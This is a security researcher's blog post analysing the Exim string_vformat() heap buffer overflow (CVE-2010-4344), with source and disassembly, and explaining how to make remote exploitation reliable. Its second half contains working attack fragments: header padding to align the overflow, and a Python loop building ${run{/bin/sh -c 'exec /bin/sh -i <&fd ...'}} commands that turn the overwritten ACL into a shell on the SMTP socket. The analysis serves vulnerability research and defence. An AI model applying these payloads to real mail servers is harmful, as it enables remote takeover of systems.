About Us | Contact Us    

 


 

VUPEN Research

 
  VUPEN Research Team
  VUPEN Research Blog
  VUPEN Research Videos
 
   

VUPEN Vulnerability Research Team (VRT) Blog

 
Technical Analysis of Exim "string_vformat()" Buffer Overflow Vulnerability
 
Published on 2010-12-21 15:16:26 UTC by Matthieu Bonetti, Security Researcher @ VUPEN

Twitter LinkedIn Delicious Digg Slashdot

Hi everyone,

An interesting vulnerability (CVE-2010-4344) was recently exploited in the wild to remotely and fully compromise systems where the Exim message transfer agent is installed. While the vulnerability itself is simple, creating a reliable code execution exploit involves precise calculations. A reliable exploit was first released by jduck1337, and other (less reliable) codes have followed on the web.

In this blog, we will share our binary analysis of the vulnerability and how we achieved reliable exploitation.

1. Technical Analysis of the Vulnerability

The vulnerability results from a buffer overflow error within the "string_vformat()" function when processing malformed email messages and headers.

Exim uses various custom functions to handle strings, they can be found in the "exim-4.69/src/string.c" file. One of them is "string_vformat()" and it works as follows :

- a pointer "p" is set to buffer
- a pointer "last" is set to buffer + buflen - 1
 
 
1066 BOOL
1067 string_vformat(uschar *buffer, int buflen, char *format, va_list ap)
1068 {
1069 enum { L_NORMAL, L_SHORT, L_LONG, L_LONGLONG, L_LONGDOUBLE };
1070
1071 BOOL yield = TRUE;
1072 int width, precision;
1073 char *fp = format;                             /* Deliberately not unsigned */
1074 uschar *p = buffer;
1075 uschar *last = buffer + buflen - 1;
1076
1077 string_datestamp_offset = -1;              /* Datestamp not inserted */
 

Then, two variables "width" and "precision" are set to -1:

 
1102 item_start = fp;
1103 width = precision = -1;
1104
1105 if (strchr("-+ #0", *(++fp)) != NULL)

 

The supplied argument "format" is evaluated. If a %s is encountered, the following steps are achieved:

- First, the length of buffer is calculated using "strlen()" and not buflen
- Then, if width is negative and if precision is negative: width and precision are set to the buffer length resulting from "strlen()"

 
1238 case 'S':                                             /* Forces *lower* case */
1239 s = va_arg(ap, char *);
1240
1241 INSERT_STRING:                                /* Come to from %D above */
1242 if (s == NULL) s = null;
1243 slen = Ustrlen(s);
1244
1245 /* If the width is specified, check that there is a precision
1246 set; if not, set it to the width to prevent overruns of long
1247 strings. */
1248
1249 if (width >= 0)
[?]
1256
1257 else if (precision >= 0)
[?]
1263
1264 else width = precision = slen;
1265
1266 /* Check string space, and add the string to the buffer if ok.

 

If "p" is larger than "last - width", the two variables width and precision are changed.

 
1267 not OK, add part of the string (debugging uses this to show as
1268 much as possible). */
1269
1270 if (p >= last - width)
1271 {
1272 yield = FALSE;
1273 width = precision = last - p - 1;
1274 }
 

Once done, width and precision are used with the "sprint()" function. The content of the buffer is copied until a NULL byte is encountered or the width and precision are reached.

 
1275 sprintf(CS p, "%*.*s", width, precision, s);
1276 if (fp[-1] == 'S')
1277 while (*p) { *p = tolower(*p); p++; }
1278 else
1279 while (*p) p++;
 

To fully understand the internals of the "string_vformat()" function, let's use it with the following arguments:

         - string_vformat(buffer, 3, "%c %s", ap)

ap is a va_list containing a character and a long string: "looooooooooong buffer" for example.

First, p and last are set:

         - p points to buffer which is at 0x08CCC965 for example
         - last points to 0x08CCC965 + 3 - 1 = 0x08CCC967

Then, "%c" is treated and p is increased by the size of a char and a space:

           p = 0x08CCC965 + 2 = 0x08CCC967

Then width and precision are set to -1.

"%s" is then treated:

         - slen is set to 21 (using strlen()).
         - width and precision are set to 21 as they were negative.

The last minus the new width becomes smaller than p:

          0x08CCC967 - 21 = 0x08ccc952
          0x08CCC967 > 0x8ccc952

The variables width and precision are changed:

          width = precision = last - p - 1
          width = precision = 0x08CCC967 - 0x08CCC967 - 1
          width = precision = -1

When the "sprintf()" function is called, the long string is copied with a width and a precision of 0xFFFFFFFF. The full content of the long string in the va_list is copied despite the size limit of 3.

This leads to a heap-based buffer overflow. This behavior can be seen from the assembly code as well.

First, p and last are set:

 
.text:080A99E9 mov edx, [ebp+buffer]                         // p
.text:080A99EC mov eax, [ebp+buflen]
.text:080A99EF mov ecx, [ebp+format]
.text:080A99F2 mov string_datestamp_offset, 0FFFFFFFFh
.text:080A99FC mov edi, edx
.text:080A99FE lea eax, [edx+eax-1]
.text:080A9A02 mov [ebp+last], eax                            // last
.text:080A9A05 sub eax, 1
.text:080A9A08 mov [ebp+src], ecx
.text:080A9A0B mov [ebp+yield], 1
.text:080A9A12 mov [ebp+last_minus_one], eax          // last-1, used later
.text:080A9A15 jmp short loc_80A9A2F
 

When %s is handled, the length of the string in the va_list is calculated using "strlen()":

 
.text:080A9DE8 loc_80A9DE8:
.text:080A9DE8 mov [esp], ebx                                  // long string
.text:080A9DEB call _strlen
.text:080A9DF0 mov edx, [ebp+width]
.text:080A9DF3 test edx, edx
.text:080A9DF5 js loc_80A9F30
[?]
.text:080A9F30 loc_80A9F30:
.text:080A9F30 mov edx, [ebp+precision]
.text:080A9F33 test edx, edx
.text:080A9F35 js loc_80AA044
.text:080A9F3B mov ecx, [ebp+precision]
.text:080A9F3E cmp ecx, eax
.text:080A9F40 mov [ebp+width], ecx
.text:080A9F43 jle loc_80A9E06
.text:080A9F49 mov [ebp+width], eax
.text:080A9F4C jmp loc_80A9E06
 

last - width is compared with p and the two variables width and precision are changed.

 
.text:080A9E06 loc_80A9E06:
.text:080A9E06 mov eax, [ebp+last]
.text:080A9E09 sub eax, [ebp+width]
.text:080A9E0C cmp edi, eax
.text:080A9E0E jb short loc_80A9E22
.text:080A9E10 mov eax, [ebp+last_minus_one]
.text:080A9E13 mov [ebp+yield], 0
.text:080A9E1A sub eax, edi
.text:080A9E1C mov [ebp+precision], eax
.text:080A9E1F mov [ebp+width], eax
 

The function "sprintf()" is called with the new width and precision.

 
.text:080A9E22 loc_80A9E22:
.text:080A9E1C mov [ebp+precision], eax
.text:080A9E1F mov [ebp+width], eax
.text:080A9E28 mov [esp+10h], ebx
.text:080A9E2C mov dword ptr [esp+4], offset a_S_0     // "%*.*s"
.text:080A9E34 mov [esp+0Ch], edx
.text:080A9E38 mov [esp+8], ecx
.text:080A9E3C mov [esp], edi
.text:080A9E3F call _sprintf
.text:080A9E44 mov ebx, [ebp+var_24]
.text:080A9E47 cmp byte ptr [ebx], 53h
.text:080A9E4A jnz short loc_80A9E5B
 

As we can see, calling the "string_vformat()" function with an overly long string leads to an exploitable heap overflow condition.

To remotely trigger the vulnerability, an attacker can send a malformed email message which will be rejected and logged via the "log_write()" [exim-4.69/src/log.c] function which calls the vulnerable "string_vformat()" function.

2. Attack Vector and Reliable Code Execution

In order to exploit the vulnerability, an attacker has to find a way to reach the "string_vformat()" function with a controlled buflen and input string.

A reliable way is to send an overly large email. When such an email is received, Exim logs the error including various information related to the sender and email headers.

This is done via the "log_write()" function which logs errors this way:

          - First, it allocates a buffer of 0x2000 bytes for the error message
          - Then, it dumps the information related to the sender of the message
          - And then, it dumps each header of the received email using "string_format()"

The "string_format()" function is merely a wrapper around "string_vformat()".

The information related to the sender is formatted the following way:

          - rejected from <attacker@example.com> H=(localhost) [192.168.158.129]: message too big: read=64948256 max=52428800
          - Envelope-from: <attacker@example.com>
          - Envelope-to: <target@target.com>

Each header is dumped separated by two blank spaces. Here is the "log_write()" function in assembly code:

 
 .text:0807CC50 log_write proc near
.text:0807CC50
.text:0807CC50 var_9C = dword ptr -9Ch
.text:0807CC50 src = dword ptr -98h
.text:0807CC50 var_94 = dword ptr -94h
.text:0807CC50 n = dword ptr -90h
[?]
.text:0807D6D8 loc_807D6D8:
.text:0807D6D8 mov dword ptr [esp], 2000h
.text:0807D6DF call _malloc                                                  // Error message buffer is allocated
.text:0807D6E4 test eax, eax
.text:0807D6E6 mov ds:dword_80F37F0, eax
.text:0807D6EB jnz loc_807CCFE
.text:0807D6F1 mov eax, ds:stderr
[?]
.text:0807CEAA loc_807CEAA:
.text:0807CEAA lea eax, [ebp+arg_C]
.text:0807CEAD mov [esp+0Ch], eax
.text:0807CEB1 mov eax, ds:dword_80F37F0
.text:0807CEB6 mov edi, [ebp+arg_8]
.text:0807CEB9 mov [esp], esi
.text:0807CEBC add eax, 1FFFh
.text:0807CEC1 sub eax, esi
.text:0807CEC3 mov [esp+8], edi
.text:0807CEC7 mov [esp+4], eax
.text:0807CECB call string_vformat                                      // Dump "rejected from"
.text:0807CED0 test eax, eax
.text:0807CED2 jnz short loc_807CF2B
.text:0807CED4 mov dword ptr [esi], 2A2A2A2Ah
[?]
.text:0807D74C test ecx, ecx
.text:0807D74E jle loc_807DBF0
.text:0807D754 mov eax, ds:sender_address
.text:0807D759 mov dword ptr [esp+8], offset aEnvelopeFromS
// "Envelope-from: <%s>\n"
.text:0807D761 mov [esp], esi
.text:0807D764 mov [esp+0Ch], eax
.text:0807D768 mov eax, ds:dword_80F37F0                           
// Error msg buffer
.text:0807D76D add eax, 2000h
.text:0807D772 sub eax, esi
.text:0807D774 mov [esp+4], eax ; int
.text:0807D778 call string_format
.text:0807D77D cmp byte ptr [esi], 0
.text:0807D780 jz short loc_807D794
.text:0807D782 lea esi, [esi+0]
[?]
.text:0807D799 mov ebx, [ebp+s]
.text:0807D79C mov eax, [eax]
.text:0807D79E mov dword ptr [esp+8], offset aEnvelopeToS  
// "Envelope-to: <%s>\n"
.text:0807D7A6 mov [esp], ebx
.text:0807D7A9 mov [esp+0Ch], eax
.text:0807D7AD mov eax, ds:dword_80F37F0                         
// Error msg buffer
.text:0807D7B2 add eax, 2000h
.text:0807D7B7 sub eax, ebx
.text:0807D7B9 mov [esp+4], eax
.text:0807D7BD call string_format
.text:0807D7C2 cmp byte ptr [ebx], 0
.text:0807D7C5 jz short loc_807D7D0
[?]
.text:0807D848 loc_807D848:
.text:0807D848 mov eax, [edi+0Ch]
.text:0807D84B test eax, eax
.text:0807D84D jz short loc_807D896
.text:0807D84F mov [esp+10h], eax
.text:0807D853 mov eax, [edi+4]
.text:0807D856 mov dword ptr [esp+8], aCS_1                 
// "%c %s"
.text:0807D85E mov [esp], ebx ; s
.text:0807D861 mov [esp+0Ch], eax
.text:0807D865 mov eax, ds:dword_80F37F0                         
// Error msg buffer
.text:0807D86A add eax, 2000h
.text:0807D86F sub eax, ebx
.text:0807D871 mov [esp+4], eax ; int
.text:0807D875 call string_format                                         
// Dump a header
.text:0807D87A cmp byte ptr [ebx], 0
.text:0807D87D jz short loc_807D888
.text:0807D87F nop
[?]
.text:0807D888 loc_807D888:
.text:0807D888 test eax, eax
.text:0807D88A lea esi, [esi+0]
.text:0807D890 jz loc_807DC70
.text:0807D896
.text:0807D896 loc_807D896:
.text:0807D896 mov edi, [edi]                                             
// Is it the last header?
.text:0807D898 test edi, edi
.text:0807D89A jnz short loc_807D848                                
// Proceed the next header
 

To reliably exploit this vulnerability, an attacker has to fill the 0x2000 bytes buffer until 3 bytes are left before the last header is copied into the 0x2000 bytes buffer. This is the key of a reliable exploitation to ensure that "p" and "last" are equal (i.e. pointing to the same address).

Reliability also depends on calculating the exact and total size of the headers to be sent. This calculation must take into account various informations including: size of "MAIL FROM:" header, size of hostnames, the maximum size supported by the server, and other data related to headers and responses.

When the last header is handled, the buffer overflow occurs and the memory after the 0x2000 bytes buffer is overwritten with the content of the last header.

A few bytes after the 0x2000 bytes buffer, we can find some ACLs:

          - At 0x09C1C92E is the penultimate header
          - At 0x09C1CA0E are the ACLs

 
09C1C91E 41 41 41 41 41 41 41 41 0A 20 20 30 30 30 30 30 AAAAAAAA. 00000
09C1C92E 30 30 30 36 32 3A 20 41 41 41 41 41 41 41 41 41 00062: AAAAAAAAA
09C1C93E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
09C1C94E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
09C1C95E 41 41 41 41 41 41 0A 00 00 00 00 00 00 00 09 40 AAAAAA.........@
09C1C96E 00 00 61 40 61 2E 63 6F 6D 00 72 20 6D 65 73 73 ..a@a.com.r mess
09C1C97E 61 67 65 2C 20 65 6E 64 69 6E 67 20 77 69 74 68 age, ending with
09C1C98E 20 22 2E 22 20 6F 6E 20 61 20 6C 69 6E 65 20 62 "." on a line b
09C1C99E 79 20 69 74 73 65 6C 66 0D 0A 00 39 3A 34 37 3A y itself...9:47:
09C1C9AE 31 39 20 2D 30 35 30 30 0D 0A 00 75 65 7D 66 61 19 -0500...ue}fa
09C1C9BE 69 6C 7D 7D 7B 5C 5C 4E 5B 5C 5C 5E 5D 5C 5C 4E il}}{\\N[\\^]\\N
09C1C9CE 7D 7B 5E 5E 7D 7D 7D 7B 5C 5C 4E 28 5B 5E 3A 5D }{^^}}}{\\N([^:]
09C1C9DE 2B 3A 29 28 2E 2A 29 5C 5C 4E 7D 7B 5C 5C 24 32 +:)(.*)\\N}{\\$2
09C1C9EE 7D 7D 22 0A 00 5C 5C 5E 5D 5C 5C 4E 7D 7B 5E 5E }}"..\\^]\\N}{^^
09C1C9FE 7D 7D 7D 7B 7D 7D 7D 7B 7D 66 61 69 6C 7D 3B 20 }}}{}}}{}fail};
09C1CA0E 24 7B 65 78 74 72 61 63 74 7B 31 7D 7B 3A 3A 7D ${extract{1}{::}
09C1CA1E 7B 24 7B 73 67 7B 24 7B 6C 6F 6F 6B 75 70 7B 24 {${sg{${lookup{$
09C1CA2E 68 6F 73 74 7D 6E 77 69 6C 64 6C 73 65 61 72 63 host}nwildlsearc
09C1CA3E 68 7B 2F 65 74 63 2F 65 78 69 6D 34 2F 70 61 73 h{/etc/exim4/pas

 

ACLs are used when evaluating the sender's address for instance. With ACLs, it is possible to execute a command such as: ${run{command}}

On Linux, when a process forks, the opened file descriptors are copied to the child process. Therefore, when the ACL command is executed, the socket file descriptor can be reused by the child. It is then easy to brute force it and use it as stdin.

 
for fd in range(3, 20):
            cmd += "${{run{{/bin/sh -c 'exec /bin/sh -i <&{0} >&0 2>&0'}}}} ".format(fd)

 

After the overflow, the ACLs are overwritten:

         - At 0x09C1C92E is the penultimate header
         - At 0x09C1C95E is the last header
         - At 0x09C1CA0E are the overwritten ACLs

 
09C1C91E 41 41 41 41 41 41 41 41 0A 20 20 30 30 30 30 30 AAAAAAAA. 00000
09C1C92E 30 30 30 36 32 3A 20 41 41 41 41 41 41 41 41 41 00062: AAAAAAAAA
09C1C93E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
09C1C94E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
09C1C95E 41 41 41 41 41 41 0A 20 20 30 30 30 30 30 30 30 AAAAAA. 0000000
09C1C96E 30 36 33 3A 20 24 7B 72 75 6E 7B 2F 62 69 6E 2F 063: ${run{/bin/
09C1C97E 73 68 20 2D 63 20 27 65 78 65 63 20 2F 62 69 6E sh -c 'exec /bin
09C1C98E 2F 73 68 20 2D 69 20 3C 26 33 20 3E 26 30 20 32 /sh -i <&3 >&0 2
09C1C99E 3E 26 30 27 7D 7D 20 24 7B 72 75 6E 7B 2F 62 69 >&0'}} ${run{/bi
09C1C9AE 6E 2F 73 68 20 2D 63 20 27 65 78 65 63 20 2F 62 n/sh -c 'exec /b
09C1C9BE 69 6E 2F 73 68 20 2D 69 20 3C 26 34 20 3E 26 30 in/sh -i <&4 >&0
09C1C9CE 20 32 3E 26 30 27 7D 7D 20 24 7B 72 75 6E 7B 2F 2>&0'}} ${run{/
09C1C9DE 62 69 6E 2F 73 68 20 2D 63 20 27 65 78 65 63 20 bin/sh -c 'exec_
09C1C9EE 2F 62 69 6E 2F 73 68 20 2D 69 20 3C 26 35 20 3E /bin/sh -i <&5 >
09C1C9FE 26 30 20 32 3E 26 30 27 7D 7D 20 24 7B 72 75 6E &0 2>&0'}} ${run
09C1CA0E 7B 2F 62 69 6E 2F 73 68 20 2D 63 20 27 65 78 65 {/bin/sh -c 'exe
09C1CA1E 63 20 2F 62 69 6E 2F 73 68 20 2D 69 20 3C 26 36 c /bin/sh -i <&6
09C1CA2E 20 3E 26 30 20 32 3E 26 30 27 7D 7D 20 24 7B 72 >&0 2>&0'}} ${r
09C1CA3E 75 6E 7B 2F 62 69 6E 2F 73 68 20 2D 63 20 27 65 un{/bin/sh -c 'e

 

In order to trigger the ACL, a second email is sent to the server using the same established connection, which leads to arbitrary code execution with Exim privileges.

If combined to a privilege escalation vulnerability (e.g. CVE-2010-4345), this flaw could be remotely exploited to execute arbitrary code with root privileges.

Our code execution exploit has been released through the VUPEN Binary Analysis & Exploits Service and was tested with Debian and Ubuntu.

İ Copyright VUPEN Security

 

VUPEN Solutions  

 


 

 

 

 

 

 

 

 

 

İ 2004-2014 VUPEN Security - Copyright - Privacy Policy